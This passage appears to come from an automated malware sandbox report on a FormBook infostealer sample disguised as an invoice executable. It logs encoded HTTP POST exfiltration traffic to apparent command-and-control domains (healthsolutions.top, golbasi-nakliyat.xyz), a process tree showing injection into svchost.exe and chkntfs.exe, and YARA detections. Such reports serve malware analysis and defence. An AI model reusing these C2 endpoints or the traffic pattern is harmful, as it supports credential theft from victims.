                              Data Raw: 4b 78 64 4c 67 4e 69 3d 6f 33 43 74 31 34 41 68 64 45 6d 58 34 41 37 32 32 4f 4a 61 65 38 55 65 6e 6a 72 34 57 37 4e 70 7a 2b 55 70 48 31 69 4e 62 70 36 77 4b 70 33 31 34 6d 56 44 4e 4e 38 61 74 76 39 52 4f 73 4d 52 45 30 4c 4d 42 37 55 4a 75 43 6f 38 62 48 6e 4f 52 4c 33 73 74 45 30 79 79 4c 44 66 33 34 4a 54 33 35 64 47 78 6d 4b 56 49 42 48 4b 45 70 7a 2f 51 43 31 53 47 43 53 5a 48 70 77 66 6c 6a 43 53 57 2b 4f 31 34 38 34 6a 4c 48 42 77 78 6d 4e 53 37 62 61 79 59 50 75 51 79 4b 79 55 53 38 4f 32 6b 6a 35 38 62 44 6e 7a 74 71 79 51 50 74 36 4c 4a 37 4b 69 57 6b 53 73 56 53 51 6d 63 61 69 69 36 2f 45 6f 41 38 59 3d
                              Data Ascii: KxdLgNi=o3Ct14AhdEmX4A722OJae8Uenjr4W7Npz+UpH1iNbp6wKp314mVDNN8atv9ROsMRE0LMB7UJuCo8bHnORL3stE0yyLDf34JT35dGxmKVIBHKEpz/QC1SGCSZHpwfljCSW+O1484jLHBwxmNS7bayYPuQyKyUS8O2kj58bDnztqyQPt6LJ7KiWkSsVSQmcaii6/EoA8Y=


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.54975213.248.169.48805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:20:05.467116117 CEST762OUTPOST /cent/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 228
                              Host: www.healthsolutions.top
                              Origin: http://www.healthsolutions.top
                              Referer: http://www.healthsolutions.top/cent/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 6f 33 43 74 31 34 41 68 64 45 6d 58 35 68 4c 32 36 4e 68 61 5a 63 55 52 6f 44 72 34 44 4c 4e 74 7a 2b 51 70 48 31 4b 64 61 61 4f 77 45 72 2f 31 37 69 68 44 59 4e 38 61 6c 50 39 55 57 4d 4d 50 45 30 4f 35 42 2f 55 4a 75 44 49 38 62 43 44 4f 52 63 62 76 73 55 30 4b 35 72 44 64 70 49 4a 54 33 35 64 47 78 6d 4f 2f 49 42 66 4b 45 5a 44 2f 53 6e 5a 52 61 79 53 61 45 70 77 66 76 44 44 62 57 2b 50 51 34 34 5a 72 4c 45 70 77 78 6d 39 53 31 71 61 31 57 50 75 65 38 71 7a 72 62 4d 48 62 6d 77 46 6d 47 44 66 37 73 35 2f 75 4b 62 58 68 54 5a 43 4b 46 45 2b 55 46 42 59 52 4e 71 44 4c 67 63 55 59 65 72 4f 48 2b 4c 4d 44 4b 57 74 4b 45 67 55 71 51 68 4c 31 33 48 76 36
                              Data Ascii: KxdLgNi=o3Ct14AhdEmX5hL26NhaZcURoDr4DLNtz+QpH1KdaaOwEr/17ihDYN8alP9UWMMPE0O5B/UJuDI8bCDORcbvsU0K5rDdpIJT35dGxmO/IBfKEZD/SnZRaySaEpwfvDDbW+PQ44ZrLEpwxm9S1qa1WPue8qzrbMHbmwFmGDf7s5/uKbXhTZCKFE+UFBYRNqDLgcUYerOH+LMDKWtKEgUqQhL13Hv6


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.54975313.248.169.48805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:20:08.008528948 CEST1779OUTPOST /cent/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 1244
                              Host: www.healthsolutions.top
                              Origin: http://www.healthsolutions.top
                              Referer: http://www.healthsolutions.top/cent/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 6f 33 43 74 31 34 41 68 64 45 6d 58 35 68 4c 32 36 4e 68 61 5a 63 55 52 6f 44 72 34 44 4c 4e 74 7a 2b 51 70 48 31 4b 64 61 62 32 77 45 65 7a 31 34 46 39 44 4b 39 38 61 76 76 39 56 57 4d 4e 4b 45 30 32 39 42 2f 51 7a 75 48 34 38 55 45 66 4f 47 2b 6a 76 6c 55 30 4b 32 4c 44 59 33 34 4a 38 33 35 4e 43 78 6d 65 2f 49 42 66 4b 45 62 62 2f 62 53 31 52 4a 69 53 5a 48 70 77 62 6c 6a 44 7a 57 2b 33 6d 34 34 64 37 4c 31 4a 77 78 43 5a 53 35 34 69 31 65 50 75 63 37 71 7a 7a 62 4d 62 59 6d 77 5a 71 47 44 71 67 73 35 33 75 4c 36 36 6e 4b 74 79 33 48 58 6d 79 50 52 34 55 62 4f 4c 6c 76 4e 41 62 64 5a 6a 39 37 70 41 53 4e 57 42 50 41 42 45 6c 4f 6d 54 6e 6d 41 71 36 51 2f 54 42 39 71 44 39 46 46 56 5a 2f 59 48 6c 45 45 54 71 53 6e 32 69 4f 30 4f 57 6a 41 6f 34 51 6f 64 5a 57 49 6d 35 74 45 4b 39 53 32 4c 52 6b 75 33 49 51 47 53 53 61 68 4d 6f 6c 59 2b 48 69 77 67 57 46 76 52 55 61 65 75 65 67 30 51 79 34 71 4f 47 2f 79 7a 31 6a 32 4c 58 46 43 63 79 6a 79 53 4e 34 35 4f 55 33 43 36 36 6b 43 [TRUNCATED]
                              Data Ascii: KxdLgNi=o3Ct14AhdEmX5hL26NhaZcURoDr4DLNtz+QpH1Kdab2wEez14F9DK98avv9VWMNKE029B/QzuH48UEfOG+jvlU0K2LDY34J835NCxme/IBfKEbb/bS1RJiSZHpwbljDzW+3m44d7L1JwxCZS54i1ePuc7qzzbMbYmwZqGDqgs53uL66nKty3HXmyPR4UbOLlvNAbdZj97pASNWBPABElOmTnmAq6Q/TB9qD9FFVZ/YHlEETqSn2iO0OWjAo4QodZWIm5tEK9S2LRku3IQGSSahMolY+HiwgWFvRUaeueg0Qy4qOG/yz1j2LXFCcyjySN45OU3C66kCmK3eSJPIhOah5NzrsdPlVb+73ANoTnZA392T76IIC3ASv0C9LESxSsYIGhT3VHqyP0b1yo9C2jHmew/h8tSia1wKx3jvUsE/3sn6RBDAxbpsUYgYEbjhyou2w1gAZ8g193h1S9zFJX4+H00of2vo80+SmK1TVjLesK8jOaxsBP9VXYApVwsTClZz2ujQ4Fe0hMhABxjT+DzpA4BUVKyhh3C58SgbveqNL1fe/P05cprTy4+IyxS0PsVK/dYp1WeYRSjB++LGzxl571tKAxEpHrkZRPi7EaUw/Vf5S6Vh4E4LxN98m5OzJ8KMNjooRa6QDQ9kHSHnM8SfZhfKK3Rv1nfmRliS6+THryUNxmrUyYsTAFtqW1z01fT8MYFVs95oACriayRTHqEgY7FdC/y5DBcICMYNuWXWp6QD3XUtoxRy36oBctUfGN1rbkk799bstHrHPXR69CF0Hnan94p7dlAxdKG0EiFW+XsKq9IHjBqpBgNiMAjz1qLsSw7m0e+EeWOf3mUulCYvJKJ4GLUzl+eiSQMcWHdWx0jKB5j+iQNgAPJWq8UWrv+HL3JObcy7AlrSObJAdfZkJGW039oxIcXopswcVagklXC3pV8l+EMAKth8vAoiyGihp9EpETtCx14jg6QdSPPiicu0bciKQUeQuccmD07hto [TRUNCATED]


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.54975413.248.169.48805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:20:10.552155972 CEST465OUTGET /cent/?KxdLgNi=l1qN2MMhbl/x2ijEy8ZaF/5dmnCULpNS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vt2dguJryr4Bj4IAYy1znQiWrTpPSXnN2bxPBAKdOlTmcCg==&lL2=1ZRtX HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.healthsolutions.top
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:20:11.000072002 CEST405INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Fri, 30 Aug 2024 07:20:10 GMT
                              Content-Type: text/html
                              Content-Length: 265
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4b 78 64 4c 67 4e 69 3d 6c 31 71 4e 32 4d 4d 68 62 6c 2f 78 32 69 6a 45 79 38 5a 61 46 2f 35 64 6d 6e 43 55 4c 70 4e 53 2b 59 55 31 48 78 57 68 62 38 4b 71 65 35 33 35 6c 6b 4e 47 61 66 78 33 30 4e 67 78 47 4c 49 4a 4a 45 53 74 41 72 55 6d 7a 58 49 72 5a 30 62 7a 4b 4f 37 76 74 32 64 67 75 4a 72 79 72 34 42 6a 34 49 41 59 79 31 7a 6e 51 69 57 72 54 70 50 53 58 6e 4e 32 62 78 50 42 41 4b 64 4f 6c 54 6d 63 43 67 3d 3d 26 6c 4c 32 3d 31 5a 52 74 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?KxdLgNi=l1qN2MMhbl/x2ijEy8ZaF/5dmnCULpNS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vt2dguJryr4Bj4IAYy1znQiWrTpPSXnN2bxPBAKdOlTmcCg==&lL2=1ZRtX"}</script></head></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.54975585.159.66.93805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:20:24.268382072 CEST745OUTPOST /gxi9/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 208
                              Host: www.golbasi-nakliyat.xyz
                              Origin: http://www.golbasi-nakliyat.xyz
                              Referer: http://www.golbasi-nakliyat.xyz/gxi9/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 5a 70 64 53 61 4d 6b 47 39 6c 48 6e 41 74 46 33 44 57 49 33 34 61 56 34 42 69 76 45 55 74 73 71 4a 74 52 2b 31 31 4a 6a 48 71 38 42 4c 65 39 61 52 68 46 47 4e 38 6f 6f 69 6e 73 76 5a 53 6b 33 77 54 35 31 57 69 34 6d 71 70 78 6c 71 43 4a 4f 37 4f 56 6f 74 71 5a 34 66 31 4e 57 6e 68 52 4f 54 6a 69 51 67 6f 52 6c 69 76 55 34 52 78 47 63 6a 2b 6d 6d 41 64 47 7a 77 74 4c 6b 65 73 61 4e 41 52 50 51 57 6d 4e 30 49 46 6a 41 54 39 58 65 69 78 48 5a 38 76 34 6b 37 30 30 48 63 34 7a 73 72 35 6e 58 34 6d 30 55 65 2f 4c 72 47 73 31 32 32 75 61 39 48 78 46 4a 43 68 66 77 52 2f 79 4d 56 67 2f 6a 30 6a 55 3d
                              Data Ascii: KxdLgNi=ZpdSaMkG9lHnAtF3DWI34aV4BivEUtsqJtR+11JjHq8BLe9aRhFGN8ooinsvZSk3wT51Wi4mqpxlqCJO7OVotqZ4f1NWnhROTjiQgoRlivU4RxGcj+mmAdGzwtLkesaNARPQWmN0IFjAT9XeixHZ8v4k700Hc4zsr5nX4m0Ue/LrGs122ua9HxFJChfwR/yMVg/j0jU=
                              Aug 30, 2024 09:20:24.986267090 CEST225INHTTP/1.1 404 Not Found
                              Server: nginx/1.14.1
                              Date: Fri, 30 Aug 2024 07:20:24 GMT
                              Content-Length: 0
                              Connection: close
                              X-Rate-Limit-Limit: 5s
                              X-Rate-Limit-Remaining: 19
                              X-Rate-Limit-Reset: 2024-08-30T07:20:29.8694509Z


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.54975685.159.66.93805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:20:26.820211887 CEST765OUTPOST /gxi9/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 228
                              Host: www.golbasi-nakliyat.xyz
                              Origin: http://www.golbasi-nakliyat.xyz
                              Referer: http://www.golbasi-nakliyat.xyz/gxi9/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 5a 70 64 53 61 4d 6b 47 39 6c 48 6e 41 4e 56 33 51 6c 67 33 2f 36 56 37 4c 43 76 45 65 4e 73 75 4a 74 64 2b 31 30 4e 7a 53 49 59 42 4d 36 35 61 51 6b 70 47 4d 38 6f 6f 71 48 73 71 64 53 6b 77 77 54 30 4b 57 67 38 6d 71 70 4e 6c 71 44 35 4f 37 64 39 76 74 36 5a 36 45 46 4e 55 36 52 52 4f 54 6a 69 51 67 6f 55 79 69 76 4d 34 53 42 57 63 69 61 36 68 49 39 47 30 33 74 4c 6b 61 73 61 52 41 52 50 79 57 6b 35 53 49 47 58 41 54 34 72 65 68 6c 54 47 79 76 34 69 6c 30 31 4b 63 70 79 68 6e 61 4f 59 2b 6c 46 4c 43 63 6a 6d 44 61 59 63 73 4d 53 56 55 52 70 78 53 79 58 48 41 50 54 6c 50 44 76 54 71 30 41 6d 79 62 35 72 48 4f 55 6b 6a 78 33 6d 4e 5a 52 37 61 4b 73 31
                              Data Ascii: KxdLgNi=ZpdSaMkG9lHnANV3Qlg3/6V7LCvEeNsuJtd+10NzSIYBM65aQkpGM8ooqHsqdSkwwT0KWg8mqpNlqD5O7d9vt6Z6EFNU6RROTjiQgoUyivM4SBWcia6hI9G03tLkasaRARPyWk5SIGXAT4rehlTGyv4il01KcpyhnaOY+lFLCcjmDaYcsMSVURpxSyXHAPTlPDvTq0Amyb5rHOUkjx3mNZR7aKs1
                              Aug 30, 2024 09:20:27.507806063 CEST225INHTTP/1.1 404 Not Found
                              Server: nginx/1.14.1
                              Date: Fri, 30 Aug 2024 07:20:27 GMT
                              Content-Length: 0
                              Connection: close
                              X-Rate-Limit-Limit: 5s
                              X-Rate-Limit-Remaining: 18
                              X-Rate-Limit-Reset: 2024-08-30T07:20:29.8694509Z


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.54975785.159.66.93805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:20:29.362643003 CEST1782OUTPOST /gxi9/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 1244
                              Host: www.golbasi-nakliyat.xyz
                              Origin: http://www.golbasi-nakliyat.xyz
                              Referer: http://www.golbasi-nakliyat.xyz/gxi9/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 5a 70 64 53 61 4d 6b 47 39 6c 48 6e 41 4e 56 33 51 6c 67 33 2f 36 56 37 4c 43 76 45 65 4e 73 75 4a 74 64 2b 31 30 4e 7a 53 49 51 42 4d 50 74 61 52 48 78 47 4b 4d 6f 6f 6b 6e 73 72 64 53 6c 73 77 51 45 4f 57 67 77 63 71 76 42 6c 72 67 68 4f 73 38 39 76 6d 36 5a 36 4d 6c 4e 56 6e 68 51 55 54 6a 79 55 67 6f 45 79 69 76 4d 34 53 48 79 63 79 2b 6d 68 4b 39 47 7a 77 74 4c 6f 65 73 61 74 41 56 61 4e 57 6b 74 6b 49 31 50 41 54 5a 62 65 6e 57 72 47 36 76 34 67 67 30 30 5a 63 73 72 68 6e 62 6a 6e 2b 6b 78 74 43 66 7a 6d 42 39 39 57 78 49 4f 6f 4c 68 4a 4f 5a 6c 72 4b 59 61 66 7a 49 46 54 53 6a 54 34 49 37 71 74 48 52 62 67 2f 31 44 36 6f 55 50 42 74 55 73 51 31 6b 33 68 43 4f 75 32 47 41 6d 71 73 59 6a 57 43 65 6d 37 77 42 52 7a 50 39 48 68 6e 45 38 4c 35 35 48 68 70 6f 6f 7a 36 7a 49 64 74 35 57 63 6f 6c 4e 4e 4c 67 44 69 6c 41 61 77 6a 47 66 47 52 4d 64 61 46 70 52 2b 6a 47 42 37 32 73 64 37 43 50 2b 32 35 2f 4c 47 41 38 4c 39 72 31 6a 53 62 49 2f 34 6f 51 33 70 57 58 2b 32 76 68 59 [TRUNCATED]
                              Data Ascii: KxdLgNi=ZpdSaMkG9lHnANV3Qlg3/6V7LCvEeNsuJtd+10NzSIQBMPtaRHxGKMooknsrdSlswQEOWgwcqvBlrghOs89vm6Z6MlNVnhQUTjyUgoEyivM4SHycy+mhK9GzwtLoesatAVaNWktkI1PATZbenWrG6v4gg00Zcsrhnbjn+kxtCfzmB99WxIOoLhJOZlrKYafzIFTSjT4I7qtHRbg/1D6oUPBtUsQ1k3hCOu2GAmqsYjWCem7wBRzP9HhnE8L55Hhpooz6zIdt5WcolNNLgDilAawjGfGRMdaFpR+jGB72sd7CP+25/LGA8L9r1jSbI/4oQ3pWX+2vhYiAeaNpxXhIlyxlfc/ElP10ofRF1jLRC+zJrssvR3MkQAoXJZC10o/LVBmfxdWoTPlPHWjMickI55X09hphvPAZBH88+NkqJpcJKsRhKozwlTgHTz+WiGdBRY3Tfs+F9YhL3ddPpxDafc0Iq1hziGio+9ROXx8nIIYYFRDnF85A1iMaZjg02mM8Mw0/mOFxMOk/LCaEZ9IweTC4lKAjWvchQ6Px/FKlj+UTOgbbZvbi2M7w6XQqDfF5tq/z+VI3IoDR6iQwYloIUW98EpG21Vzj1K72IhlV+TRQMH/LhSdt46Uur2AKpujKvfn73O/H/H562L0cxsvXPYMkCPvlSnZSF9LZ5QAr9iOSdgUSDEUyd30UDDBjvGUxK3uREpejG6lI0gKAMzmNRovFPrOYnWASRlGcqYh1kJXu2HfoNQ921BtVMXXdd9CtXk8vYIQhFHWb4ZhHEoQJm0cqkLet/xtLT+aEgmUNrwDMS1q+My1D+/4bSD3+PSaIsGu0xMI5oKCoLl1E1CM9z69iBhDTYmIUJnCZxQIL5cDTurY6yMuZEa4TLegWpbDUprVGepbejfTpy0GAEiPS9ho5c2j5OO3lN2yfr6Ir0uBE7XAJbsbhs0cEp02IMa/ML72LL+ETPzX0VYmdzWfFd348OstNAgCMUZPCrUhJeFUA [TRUNCATED]
                              Aug 30, 2024 09:20:30.057262897 CEST225INHTTP/1.1 404 Not Found
                              Server: nginx/1.14.1
                              Date: Fri, 30 Aug 2024 07:20:29 GMT
                              Content-Length: 0
                              Connection: close
                              X-Rate-Limit-Limit: 5s
                              X-Rate-Limit-Remaining: 19
                              X-Rate-Limit-Reset: 2024-08-30T07:20:34.9486025Z


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.54975885.159.66.93805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:20:31.912564039 CEST466OUTGET /gxi9/?lL2=1ZRtX&KxdLgNi=Ur1yZ7cx/WDhKbJVMH1InawKNi3bU8kDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGka4if3ZKlzYFZx3st7o0oN1uEWmnrbWQQ6vJ4evJTffgTg== HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.golbasi-nakliyat.xyz
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:20:32.583193064 CEST225INHTTP/1.1 404 Not Found
                              Server: nginx/1.14.1
                              Date: Fri, 30 Aug 2024 07:20:32 GMT
                              Content-Length: 0
                              Connection: close
                              X-Rate-Limit-Limit: 5s
                              X-Rate-Limit-Remaining: 19
                              X-Rate-Limit-Reset: 2024-08-30T07:20:37.4784443Z


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:03:16:29
                              Start date:30/08/2024
                              Path:C:\Users\user\Desktop\INV20240828.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\INV20240828.exe"
                              Imagebase:0x50000
                              File size:1'263'104 bytes
                              MD5 hash:D609D71D66A4AD2AAEDA58A4368C901B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:2
                              Start time:03:16:43
                              Start date:30/08/2024
                              Path:C:\Windows\SysWOW64\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\INV20240828.exe"
                              Imagebase:0xb60000
                              File size:46'504 bytes
                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2403022417.00000000070F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2403022417.00000000070F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2396873201.0000000003FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2396873201.0000000003FE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:03:16:57
                              Start date:30/08/2024
                              Path:C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe"
                              Imagebase:0xd80000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4505559577.0000000002DA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4505559577.0000000002DA0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:5
                              Start time:03:16:58
                              Start date:30/08/2024
                              Path:C:\Windows\SysWOW64\chkntfs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                              Imagebase:0xc0000
                              File size:19'968 bytes
                              MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4504655296.0000000002980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4504655296.0000000002980000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4504355624.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4504355624.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4505524370.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4505524370.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:6
                              Start time:03:17:11
                              Start date:30/08/2024
                              Path:C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe"
                              Imagebase:0xd80000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4507474267.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4507474267.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:8
                              Start time:03:17:23
                              Start date:30/08/2024
                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                              Imagebase:0x7ff79f9e0000
                              File size:676'768 bytes
                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:1.5%
                                Dynamic/Decrypted Code Coverage:5.3%
                                Signature Coverage:13.6%
                                Total number of Nodes:132
